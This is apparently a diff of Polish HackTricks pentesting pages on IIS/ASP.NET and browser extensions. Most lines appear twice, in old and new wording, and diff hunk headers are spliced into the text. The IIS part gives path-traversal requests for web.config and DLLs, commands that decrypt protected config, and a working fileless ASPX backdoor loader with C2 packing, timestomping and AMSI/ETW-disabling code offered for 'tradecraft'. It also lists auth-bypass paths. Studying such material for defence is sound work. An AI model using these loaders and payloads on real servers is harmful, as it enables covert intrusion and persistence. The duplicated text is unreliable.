W **aplikacjach .Net MVC** plik **web.config** odgrywa kluczową rolę, określając każdy plik binarny, na którym opiera się aplikacja, za pomocą tagów XML **"assemblyIdentity"**.
W **.Net MVC applications**, plik **web.config** odgrywa kluczową rolę, określając każdy plik binarny, na którym aplikacja polega, przez tagi XML **"assemblyIdentity"**.
### **Eksploracja plików binarnych**
### **Badanie plików binarnych**
Przykład dostępu do pliku **web.config** pokazano poniżej:
Poniżej pokazano przykład uzyskania dostępu do pliku **web.config**:
```html
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
```
To żądanie ujawnia różne ustawienia i zależności, takie jak:
- **EntityFramework** wersja
- **AppSettings** dla stron internetowych, walidacji klienta i JavaScript
- **System.web** konfiguracje dla uwierzytelniania i czasu wykonywania
- **System.webServer** ustawienia modułów
- **Runtime** powiązania zestawów dla licznych bibliotek, takich jak **Microsoft.Owin**, **Newtonsoft.Json** i **System.Web.Mvc**
- wersja **EntityFramework**
- **AppSettings** dla webpages, client validation i JavaScript
- konfiguracje **System.web** dotyczące uwierzytelniania i runtime
- ustawienia modułów **System.webServer**
- powiązania assembly w **Runtime** dla wielu bibliotek, takich jak **Microsoft.Owin**, **Newtonsoft.Json** i **System.Web.Mvc**
Te ustawienia wskazują, że niektóre pliki, takie jak **/bin/WebGrease.dll**, znajdują się w folderze /bin aplikacji.
Te ustawienia wskazują, że niektóre pliki, takie jak **/bin/WebGrease.dll**, znajdują się w katalogu /bin aplikacji.
### **Pliki w katalogu głównym**
Pliki znajdujące się w katalogu głównym, takie jak **/global.asax** i **/connectionstrings.config** (który zawiera wrażliwe hasła), są niezbędne do konfiguracji i działania aplikacji.
Pliki znalezione w katalogu głównym, takie jak **/global.asax** i **/connectionstrings.config** (który zawiera wrażliwe hasła), są niezbędne do konfiguracji i działania aplikacji.
### **Przestrzenie nazw i Web.Config**
Aplikacje MVC definiują również dodatkowe **web.config files** dla specyficznych przestrzeni nazw, aby uniknąć powtarzalnych deklaracji w każdym pliku, co zostało pokazane w żądaniu pobrania innego **web.config**:
Aplikacje MVC definiują również dodatkowe **web.config files** dla określonych przestrzeni nazw, aby uniknąć powtarzających się deklaracji w każdym pliku, jak pokazano na żądaniu pobrania innego **web.config**:
```html
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **Pobieranie DLL**
### **Pobieranie plików DLL**
Wzmianka o niestandardowej przestrzeni nazw sugeruje istnienie DLL o nazwie "**WebApplication1**" w katalogu /bin. Następnie pokazano żądanie pobrania **WebApplication1.dll**:
Wzmianka o niestandardowej przestrzeni nazw sugeruje istnienie pliku DLL o nazwie "**WebApplication1**" w katalogu /bin. Następnie pokazano żądanie pobrania **WebApplication1.dll**:
```html
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
To sugeruje obecność innych istotnych DLL, takich jak **System.Web.Mvc.dll** i **System.Web.Optimization.dll**, w katalogu /bin.
To sugeruje obecność innych niezbędnych DLL, takich jak **System.Web.Mvc.dll** i **System.Web.Optimization.dll**, w katalogu /bin.
W scenariuszu, w którym DLL importuje przestrzeń nazw o nazwie **WebApplication1.Areas.Minded**, atakujący może wywnioskować istnienie innych plików web.config w przewidywalnych ścieżkach, takich jak **/area-name/Views/**, zawierających specyficzne konfiguracje i odniesienia do innych DLL w folderze /bin. Na przykład, żądanie do **/Minded/Views/web.config** może ujawnić konfiguracje i przestrzenie nazw, które wskazują na obecność innego DLL, **WebApplication1.AdditionalFeatures.dll**.
W scenariuszu, w którym DLL importuje przestrzeń nazw nazwaną **WebApplication1.Areas.Minded**, atakujący może wnioskować o istnieniu innych plików web.config w przewidywalnych ścieżkach, takich jak **/area-name/Views/**, które zawierają określone konfiguracje i odwołania do innych DLL w folderze /bin. Na przykład żądanie do **/Minded/Views/web.config** może ujawnić konfiguracje i przestrzenie nazw wskazujące na obecność innego DLL, **WebApplication1.AdditionalFeatures.dll**.
### Common files
### Typowe pliki
From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
Źródło: [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
@ -183,45 +183,162 @@ C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404 Error
## HTTPAPI 2.0 Błąd 404
Jeśli zobaczysz błąd podobny do poniższego:
If you see an error like the following one:
![](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
![](<../../images/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
Oznacza to, że serwer **nie otrzymał poprawnej nazwy domeny** w nagłówku Host.\
Aby uzyskać dostęp do strony internetowej, możesz spojrzeć na serwowany **certyfikat SSL** i być może znajdziesz tam nazwę domeny/poddomeny. Jeśli jej tam nie ma, może być konieczne **brute force VHosts**, aż znajdziesz poprawną.
Aby uzyskać dostęp do strony, możesz sprawdzić wystawiony **SSL Certificate** i być może znajdziesz tam nazwę domeny/subdomeny. Jeśli jej tam nie ma, może być konieczne **brute force VHosts**, aż znajdziesz właściwą.
## Decrypt encrypted configuration and ASP.NET Core Data Protection key rings
Two common patterns to protect secrets on IIS-hosted .NET apps are:
- ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) dla sekcji web.config takich jak <connectionStrings>.
- ASP.NET Core Data Protection key ring (persisted locally) używany do ochrony sekretów aplikacji i cookies.
If you have filesystem or interactive access on the web server, co-located keys often allow decryption.
- ASP.NET (Full Framework) odszyfruj chronione sekcje konfiguracyjne za pomocą aspnet_regiis:
```cmd
# Decrypt a section by app path (site configured in IIS)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication"
# Or specify the physical path (-pef/-pdf write/read to a config file under a dir)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication"
```
- ASP.NET Core szukaj Data Protection key rings przechowywanych lokalnie (pliki XML/JSON) w lokalizacjach takich jak:
- %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys
- HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry)
- App-managed folder (e.g., App_Data\keys or a Keys directory next to the app)
Mając key ring, operator uruchomiony w tożsamości aplikacji może zainstancjonować IDataProtector z tymi samymi purposes i odszyfrować przechowywane sekrety. Błędne konfiguracje, które trzymają key ring razem z plikami aplikacji, czynią deszyfrowanie offline trywialnym po kompromitacji hosta.
## IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)
Toolkit Phantom Taurus/NET-STAR pokazuje dojrzały wzorzec dla fileless IIS persistence i postexploitation całkowicie wewnątrz w3wp.exe. Kluczowe pomysły są szeroko używalne dla własnego tradecraft i dla detection/hunting.
Key building blocks
- ASPX bootstrapper hosting an embedded payload: pojedyncza strona .aspx (np. OutlookEN.aspx) zawiera Base64zakodowany, opcjonalnie Gzipskomprymowany .NET DLL. Po żądaniu trigger rozkodowuje, dekompresuje i reflectively ładuje go do bieżącego AppDomain i wywołuje główny punkt wejścia (np. ServerRun.Run()).
- Cookiescoped, encrypted C2 z multistage packing: zadania/wyniki są opakowane jako Gzip → AESECB/PKCS7 → Base64 i przesyłane przez pozornie legitne cookieheavy requests; operatorzy używali stabilnych delimiterów (np. "STAR") do chunkingu.
- Reflective .NET execution: akceptuje dowolne managed assemblies jako Base64, ładuje przez Assembly.Load(byte[]) i przekazuje operator args dla szybkiej zmiany modułów bez zapisu na dysku.
- Operating in precompiled ASP.NET sites: dodawanie/zarządzanie pomocniczymi shells/backdoors nawet gdy serwis jest precompiled (np. dropper dodaje dynamiczne strony/handlery lub korzysta z config handlers) wystawiane przez komendy takie jak bypassPrecompiledApp, addshell, listshell, removeshell.
- Timestomping/metadata forgery: udostępnij changeLastModified action i timestomp podczas deploymentu (włączając przyszłe timestamps kompilacji) by utrudnić DFIR.
- Optional AMSI/ETW predisable for loaders: secondstage loader może wyłączyć AMSI i ETW przed wywołaniem Assembly.Load, aby zmniejszyć inspekcję inmemory payloadów.
Minimal ASPX loader pattern
```aspx
<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
// 1) Obtain payload bytes (hardcoded blob or from request)
string b64 = /* hardcoded or Request["d"] */;
byte[] blob = Convert.FromBase64String(b64);
// optional: decrypt here if AES is used
using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
using(var ms = new MemoryStream()){
gz.CopyTo(ms);
var asm = Assembly.Load(ms.ToArray());
// 2) Invoke the managed entry point (e.g., ServerRun.Run)
var t = asm.GetType("ServerRun");
var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
object inst = m.IsStatic ? null : Activator.CreateInstance(t);
m.Invoke(inst, new object[]{ HttpContext.Current });
}
}
}
</script>
```
Narzędzia pomocnicze do pakowania/kryptografii (Gzip + AESECB + Base64)
```csharp
using System.Security.Cryptography;
static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
using(var aes = Aes.Create()){
aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
return t.TransformFinalBlock(data, 0, data.Length);
}
}
static string Pack(object obj, byte[] key){
// serialize → gzip → AESECB → Base64
byte[] raw = Serialize(obj); // your TLV/JSON/msgpack
using var ms = new MemoryStream();
using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
byte[] enc = AesEcb(ms.ToArray(), key, true);
return Convert.ToBase64String(enc);
}
static T Unpack<T>(string b64, byte[] key){
byte[] enc = Convert.FromBase64String(b64);
byte[] cmp = AesEcb(enc, key, false);
using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
using var outMs = new MemoryStream(); gz.CopyTo(outMs);
return Deserialize<T>(outMs.ToArray());
}
```
Cookie/session flow i powierzchnia poleceń
- Session bootstrap i tasking są przenoszone za pomocą cookies, aby wtapiać się w normalną aktywność webową.
- Zaobserwowane w środowisku polecenia obejmowały: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; oraz dynamiczne prymitywy wykonawcze code_self, code_pid, run_code do wykonywania .NET w pamięci.
Narzędzie Timestomping
```csharp
File.SetCreationTime(path, ts);
File.SetLastWriteTime(path, ts);
File.SetLastAccessTime(path, ts);
```
Inline wyłączenie AMSI/ETW przed Assembly.Load (loader variant)
```csharp
// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
// and ntdll!EtwEventWrite to a stub; then load operator assembly
DisableAmsi();
DisableEtw();
Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });
```
Zobacz AMSI/ETW bypass techniques w: windows-hardening/av-bypass.md
Hunting notes (defenders)
- Pojedyncza, dziwna strona ASPX z bardzo długimi Base64/Gzip blobami; cookieheavy posts.
- Unbacked managed modules wewnątrz w3wp.exe; ciągi takie jak Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
- Powtarzające się delimitery takie jak "STAR" w ruchu; niezgodne lub nawet przyszłe znaczniki czasowe w ASPX/assemblies.
## Stare podatności IIS warte sprawdzenia
## Stare luki w IIS, na które warto zwrócić uwagę
### Microsoft IIS tilde character “\~” Vulnerability/Feature Short File/Folder Name Disclosure
Możesz spróbować **enumerować foldery i pliki** w każdym odkrytym folderze (nawet jeśli wymaga to podstawowej autoryzacji) używając tej **techniki**.\
Głównym ograniczeniem tej techniki, jeśli serwer jest podatny, jest to, że **może znaleźć tylko pierwsze 6 liter nazwy każdego pliku/folderu oraz pierwsze 3 litery rozszerzenia** plików.
Możesz spróbować **enumerate folders and files** w każdym odkrytym folderze (nawet jeśli wymaga Basic Authentication) używając tej **techniki**.\
Główne ograniczenie tej techniki, jeśli serwer jest podatny, to że **może znaleźć tylko pierwsze 6 liter nazwy każdego pliku/folderu i pierwsze 3 litery rozszerzenia** plików.
Możesz użyć [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) do testowania tej luki: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
Możesz użyć [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) aby przetestować tę podatność: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../images/image (844).png>)
Oryginalne badania: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)
Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)
Możesz również użyć **metasploit**: `use scanner/http/iis_shortname_scanner`
Możesz też użyć **metasploit**: `use scanner/http/iis_shortname_scanner`
Fajnym pomysłem na **znalezienie ostatecznej nazwy** odkrytych plików jest **zapytanie LLMs** o opcje, jak to zrobiono w skrypcie [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py)
Dobrym pomysłem, żeby **znaleźć końcową nazwę** odkrytych plików, jest **zapytanie LLMs** o opcje tak jak to robi skrypt [https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py](https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py)
### Basic Authentication bypass
**Obejdź** podstawową autoryzację (**IIS 7.5**) próbując uzyskać dostęp do: `/admin:$i30:$INDEX_ALLOCATION/admin.php` lub `/admin::$INDEX_ALLOCATION/admin.php`
Można **obejść** Basic Authentication (**IIS 7.5**) próbując uzyskać dostęp do: `/admin:$i30:$INDEX_ALLOCATION/admin.php` lub `/admin::$INDEX_ALLOCATION/admin.php`
Możesz spróbować **połączyć****lukę** z ostatnią, aby znaleźć nowe **foldery** i **obejść** autoryzację.
Można spróbować **połączyć****podatność** z poprzednią, aby znaleźć nowe **foldery** i **obejść** uwierzytelnianie.
## ASP.NET Trace.AXD enabled debugging
ASP.NET zawiera tryb debugowania, a jego plik nazywa się `trace.axd`.
Zachowuje bardzo szczegółowy dziennik wszystkich żądań wysyłanych do aplikacji przez pewien czas.
Zawiera bardzo szczegółowy log wszystkich żądań wykonanych do aplikacji w danym okresie.
Informacje te obejmują zdalne adresy IP klientów, identyfikatory sesji, wszystkie ciasteczka żądań i odpowiedzi, fizyczne ścieżki, informacje o kodzie źródłowym, a potencjalnie nawet nazwy użytkowników i hasła.
Informacje te obejmują zdalne adresy IP klientów, session ID, wszystkie request i response cookies, ścieżki fizyczne, informacje o source code oraz potencjalnie nawet nazwy użytkowników i hasła.
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
@ -231,17 +348,17 @@ Informacje te obejmują zdalne adresy IP klientów, identyfikatory sesji, wszyst
ASPXAUTH używa następujących informacji:
- **`validationKey`** (string): klucz zakodowany w hex do użycia do walidacji podpisu.
- **`validationKey`** (string): klucz zakodowany w hex używany do walidacji podpisu.
- **`decryptionMethod`** (string): (domyślnie “AES”).
- **`decryptionIV`** (string): wektor inicjalizacyjny zakodowany w hex (domyślnie wektor zerowy).
- **`decryptionKey`** (string): klucz zakodowany w hex do użycia do deszyfrowania.
- **`decryptionIV`** (string): wektor inicjalizacyjny zakodowany w hex (domyślnie wektor zer).
- **`decryptionKey`** (string): klucz zakodowany w hex używany do deszyfrowania.
Jednak niektórzy ludzie będą używać **domyślnych wartości** tych parametrów i będą używać jako **ciasteczka adresu e-mail użytkownika**. Dlatego, jeśli możesz znaleźć stronę internetową używającą **tej samej platformy**, która używa ciasteczka ASPXAUTH i **stworzysz użytkownika z adresem e-mail użytkownika, którego chcesz udawać** na serwerze pod atakiem, możesz być w stanie **użyć ciasteczka z drugiego serwera w pierwszym** i udawać użytkownika.\
Ten atak zadziałał w tym [**opisie**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
Jednak niektórzy używają **domyślnych wartości** tych parametrów i stosują jako **cookie adres email użytkownika**. W związku z tym, jeśli znajdziesz witrynę używającą **tej samej platformy**, która korzysta z ASPXAUTH cookie i **utworzysz użytkownika z adresem email użytkownika, którego chcesz podszyć**, na serwerze będącym celem, możesz być w stanie **użyć cookie z drugiego serwera na pierwszym** i podszyć się pod użytkownika.\
Ten atak zadziałał w tym [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
## IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
[Pełny raport tutaj](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Błąd w kodzie **nie sprawdzał poprawnie hasła podanego przez użytkownika**, więc atakujący, którego **hash hasła trafia na klucz**, który już znajduje się w **pamięci podręcznej**, będzie mógł zalogować się jako ten użytkownik.
[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Błąd w kodzie **nieprawidłowo nie sprawdzał podanego przez użytkownika hasła**, więc atakujący, którego **hash hasła trafia na klucz** który jest już w **cache**, będzie w stanie zalogować się jako ten użytkownik.
```python
# script for sanity check
> type test.py
@ -261,4 +378,9 @@ HTTP/1.1 401 Unauthorized
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
```
## Referencje
- [Unit 42 Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
- [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)
{{#include ../../banners/hacktricks-training.md}}

401
src/pentesting-web/browser-extension-pentesting-methodology/README.md
View File

@ -1,41 +1,41 @@
# Metodologia Pentestingu Rozszerzeń Przeglądarki
# Metodologia Browser Extension Pentesting
{{#include ../../banners/hacktricks-training.md}}
## Podstawowe Informacje
## Podstawowe informacje
Rozszerzenia przeglądarki są napisane w JavaScript i ładowane przez przeglądarkę w tle. Mają swój [DOM](https://www.w3schools.com/js/js_htmldom.asp), ale mogą wchodzić w interakcje z DOM-ami innych stron. Oznacza to, że mogą naruszać poufność, integralność i dostępność (CIA) innych stron.
Rozszerzenia przeglądarki są pisane w JavaScript i ładowane przez przeglądarkę w tle. Mają swój [DOM](https://www.w3schools.com/js/js_htmldom.asp), ale mogą wchodzić w interakcję z DOM-ami innych stron. Oznacza to, że mogą naruszyć poufność, integralność i dostępność (CIA) innych serwisów.
## Główne Komponenty
## Główne komponenty
Układy rozszerzeń wyglądają najlepiej, gdy są wizualizowane i składają się z trzech komponentów. Przyjrzyjmy się każdemu komponentowi dokładniej.
Schematy rozszerzeń najlepiej wizualizować i składają się z trzech komponentów. Przyjrzyjmy się każdemu z nich szczegółowo.
<figure><img src="../../images/image (16) (1) (1).png" alt=""><figcaption><p><a href="http://webblaze.cs.berkeley.edu/papers/Extensions.pdf">http://webblaze.cs.berkeley.edu/papers/Extensions.pdf</a></p></figcaption></figure>
### **Skrypty Treści**
### **Content Scripts**
Każdy skrypt treści ma bezpośredni dostęp do DOM **jednej strony internetowej** i jest tym samym narażony na **potencjalnie złośliwe dane wejściowe**. Jednak skrypt treści nie ma żadnych uprawnień poza możliwością wysyłania wiadomości do rdzenia rozszerzenia.
Każdy content script ma bezpośredni dostęp do DOM **pojedynczej strony internetowej** i w związku z tym jest narażony na **potencjalnie złośliwe dane wejściowe**. Jednak content script nie ma żadnych uprawnień poza możliwością wysyłania wiadomości do jądra rozszerzenia.
### **Rdzeń Rozszerzenia**
### **Extension Core**
Rdzeń rozszerzenia zawiera większość uprawnień/dostępu rozszerzenia, ale rdzeń rozszerzenia może wchodzić w interakcje z treścią internetową tylko za pośrednictwem [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) i skryptów treści. Ponadto rdzeń rozszerzenia nie ma bezpośredniego dostępu do maszyny gospodarza.
Extension core zawiera większość uprawnień/dostępu rozszerzenia, ale extension core może wchodzić w interakcję z zawartością webową jedynie poprzez [XMLHttpRequest](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) oraz content scripts. Ponadto extension core nie ma bezpośredniego dostępu do maszyny hosta.
### **Natychmiastowy Plik Binarny**
### **Native Binary**
Rozszerzenie pozwala na natywny plik binarny, który może **uzyskać dostęp do maszyny gospodarza z pełnymi uprawnieniami użytkownika.** Natywny plik binarny wchodzi w interakcje z rdzeniem rozszerzenia za pośrednictwem standardowego interfejsu programowania aplikacji Netscape Plugin ([NPAPI](https://en.wikipedia.org/wiki/NPAPI)), używanego przez Flash i inne wtyczki przeglądarki.
Rozszerzenie może udostępniać natywny binarny plik, który może **uzyskać dostęp do maszyny hosta z pełnymi uprawnieniami użytkownika.** Natywny binarny plik komunikuje się z extension core za pośrednictwem standardowego Netscape Plugin Application Programming Interface ([NPAPI](https://en.wikipedia.org/wiki/NPAPI)) używanego przez Flash i inne wtyczki przeglądarki.
### Granice
> [!CAUTION]
> Aby uzyskać pełne uprawnienia użytkownika, atakujący musi przekonać rozszerzenie do przekazania złośliwych danych wejściowych ze skryptu treści do rdzenia rozszerzenia i z rdzenia rozszerzenia do natywnego pliku binarnego.
> Aby uzyskać pełne uprawnienia użytkownika, atakujący musi przekonać rozszerzenie do przekazania złośliwego wejścia ze skryptu treści do jądra rozszerzenia oraz z jądra rozszerzenia do natywnego pliku binarnego.
Każdy komponent rozszerzenia jest oddzielony od siebie przez **silne granice ochronne**. Każdy komponent działa w **osobnym procesie systemu operacyjnego**. Skrypty treści i rdzenie rozszerzeń działają w **procesach piaskownicy**, niedostępnych dla większości usług systemu operacyjnego.
Każdy komponent rozszerzenia jest odseparowany od pozostałych przez **silne granice ochronne**. Każdy komponent działa w **osobnym procesie systemu operacyjnego**. Content scripts i extension cores działają w **procesach sandbox** niedostępnych dla większości usług systemu operacyjnego.
Co więcej, skrypty treści są oddzielone od swoich powiązanych stron internetowych przez **działanie w osobnym stosie JavaScript**. Skrypt treści i strona internetowa mają **dostęp do tego samego podstawowego DOM**, ale obie **nigdy nie wymieniają wskaźników JavaScript**, co zapobiega wyciekowi funkcjonalności JavaScript.
Co więcej, content scripts są oddzielone od powiązanych stron internetowych przez **uruchamianie w osobnym stosie pamięci JavaScript**. Content script i strona mają **dostęp do tego samego underlying DOM**, ale obie **nigdy nie wymieniają wskaźników JavaScript**, co zapobiega wyciekowi funkcjonalności JavaScript.
## **`manifest.json`**
Rozszerzenie Chrome to po prostu folder ZIP z rozszerzeniem [.crx](https://www.lifewire.com/crx-file-2620391). Rdzeń rozszerzenia to plik **`manifest.json`** w katalogu głównym folderu, który określa układ, uprawnienia i inne opcje konfiguracyjne.
Rozszerzenie Chrome to po prostu folder ZIP z rozszerzeniem pliku [.crx](https://www.lifewire.com/crx-file-2620391). Rdzeniem rozszerzenia jest plik **`manifest.json`** w katalogu głównym folderu, który określa strukturę, uprawnienia oraz inne opcje konfiguracyjne.
Przykład:
```json
@ -61,7 +61,7 @@ Przykład:
```
### `content_scripts`
Skrypty zawartości są **ładowane** za każdym razem, gdy użytkownik **nawiguje do pasującej strony**, w naszym przypadku każda strona pasująca do wyrażenia **`https://example.com/*`** i niepasująca do wyrażenia regex **`*://*/*/business*`**. Wykonują się **jak własne skrypty strony** i mają dowolny dostęp do [Modelu Obiektu Dokumentu (DOM)](https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model).
Skrypty zawartości są **ładowane** za każdym razem, gdy użytkownik **przechodzi na pasującą stronę**, w naszym przypadku każda strona pasująca do wyrażenia **`https://example.com/*`** i niepasująca do regexu **`*://*/*/business*`**. Wykonują się **jak własne skrypty strony** i mają dowolny dostęp do strony [Document Object Model (DOM)](https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model).
```json
"content_scripts": [
{
@ -76,9 +76,9 @@ Skrypty zawartości są **ładowane** za każdym razem, gdy użytkownik **nawigu
}
],
```
Aby dodać lub wykluczyć więcej adresów URL, można również użyć **`include_globs`** i **`exclude_globs`**.
Aby uwzględnić lub wykluczyć więcej adresów URL, można także użyć **`include_globs`** i **`exclude_globs`**.
To jest przykładowy skrypt zawartości, który doda przycisk wyjaśnienia do strony, gdy [API storage](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) zostanie użyte do pobrania wartości `message` z pamięci rozszerzenia.
Poniższy przykładowy content script doda przycisk explain do strony, gdy [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) zostanie użyte do pobrania wartości `message` ze storage rozszerzenia.
```js
chrome.storage.local.get("message", (result) => {
let div = document.createElement("div")
@ -91,22 +91,22 @@ document.body.appendChild(div)
```
<figure><img src="../../images/image (23).png" alt=""><figcaption></figcaption></figure>
Wiadomość jest wysyłana do stron rozszerzenia przez skrypt treści, gdy ten przycisk jest klikany, poprzez wykorzystanie [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage). Wynika to z ograniczenia skryptu treści w bezpośrednim dostępie do API, przy czym `storage` jest jednym z nielicznych wyjątków. Dla funkcjonalności wykraczających poza te wyjątki, wiadomości są wysyłane do stron rozszerzenia, z którymi skrypty treści mogą komunikować się.
Gdy ten przycisk zostanie kliknięty, content script wysyła wiadomość do stron rozszerzenia za pomocą [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage). Wynika to z ograniczeń content script w bezpośrednim dostępie do API, przy czym `storage` jest jednym z nielicznych wyjątków. Dla funkcji wykraczających poza te wyjątki wiadomości są wysyłane do stron rozszerzenia, z którymi content scripts mogą się komunikować.
> [!WARNING]
> W zależności od przeglądarki, możliwości skryptu treści mogą się nieznacznie różnić. Dla przeglądarek opartych na Chromium, lista możliwości jest dostępna w [dokumentacji Chrome Developers](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities), a dla Firefox, [MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis) służy jako główne źródło.\
> Warto również zauważyć, że skrypty treści mają możliwość komunikacji z skryptami w tle, co umożliwia im wykonywanie działań i przekazywanie odpowiedzi z powrotem.
> W zależności od przeglądarki możliwości content script mogą się nieznacznie różnić. Dla przeglądarek opartych na Chromium lista możliwości jest dostępna w [Chrome Developers documentation](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities), a dla Firefox głównym źródłem jest [MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis).\
> Warto też zaznaczyć, że content scripts mogą komunikować się ze background scripts, co pozwala im wykonywać działania i przekazywać odpowiedzi z powrotem.
Aby wyświetlić i debugować skrypty treści w Chrome, menu narzędzi dewelopera Chrome można uzyskać z Opcje > Więcej narzędzi > Narzędzia dewelopera LUB naciskając Ctrl + Shift + I.
Aby przeglądać i debugować content scripts w Chrome, menu Chrome developer tools można otworzyć przez Options > More tools > Developer tools lub przez naciśnięcie Ctrl + Shift + I.
Po wyświetleniu narzędzi dewelopera, należy kliknąć na **zakładkę Źródło**, a następnie na zakładkę **Skrypty treści**. Umożliwia to obserwację działających skryptów treści z różnych rozszerzeń oraz ustawienie punktów przerwania w celu śledzenia przepływu wykonania.
Po otwarciu developer tools należy kliknąć zakładkę **Source tab**, a następnie **Content Scripts**. Umożliwia to obserwację uruchomionych content scripts z różnych rozszerzeń oraz ustawianie breakpointów w celu śledzenia przebiegu wykonania.
### Wstrzyknięte skrypty treści
### Wstrzyknięte content scripts
> [!TIP]
> Należy zauważyć, że **skrypty treści nie są obowiązkowe**, ponieważ możliwe jest również **dynamiczne** **wstrzykiwanie** skryptów oraz **programowe wstrzykiwanie ich** na stronach internetowych za pomocą **`tabs.executeScript`**. To w rzeczywistości zapewnia bardziej **szczegółową kontrolę**.
> Należy pamiętać, że **Content Scripts aren't mandatory** możliwe jest również **dynamiczne** **wstrzykiwanie** skryptów oraz **programatyczne wstrzykiwanie ich** na strony WWW za pomocą **`tabs.executeScript`**. Daje to w rzeczywistości bardziej **precyzyjną kontrolę**.
